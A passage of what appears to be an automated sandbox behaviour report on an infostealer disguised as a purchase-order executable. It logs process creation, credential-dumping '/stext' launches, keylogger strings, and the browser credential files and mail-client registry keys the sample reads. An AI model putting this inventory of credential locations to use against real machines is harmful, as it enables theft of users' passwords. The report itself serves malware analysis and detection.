              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\blnru"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\ohfuvpkfznra"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" Jump to behavior
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59103501770.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.56268814949.0000000005E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerD
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/04/26 09:42:00 Program Manager]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084581589.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084473236.0000000005E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerp/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59103501770.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084581589.0000000005E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0i/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084581589.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084473236.0000000005E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59103501770.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084581589.0000000005E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerf/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084581589.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084473236.0000000005E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerI
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeBinary or memory string: [2024/04/26 09:42:00 Program Manager]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeBinary or memory string: [2024/04/26 09:41:55 Program Manager]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.56268814949.0000000005E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager{/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084581589.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084473236.0000000005E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernitor
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/04/26 09:41:55 Program Manager]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59103501770.0000000005E1E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59084581589.0000000005E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager_/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerR
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59103501770.0000000005E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managervo
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeBinary or memory string: tarted] [2024/04/26 09:41:55 Program Manager] [Win]r [2024/04/26 09:41:58 Run]
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,137_2_0041881C
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,138_2_004082CD
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00405B99 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,5_2_00405B99
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe PID: 7048, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kajsoiestc.dat, type: DROPPED
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: ESMTPPassword138_2_004033F0
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword138_2_00402DB3
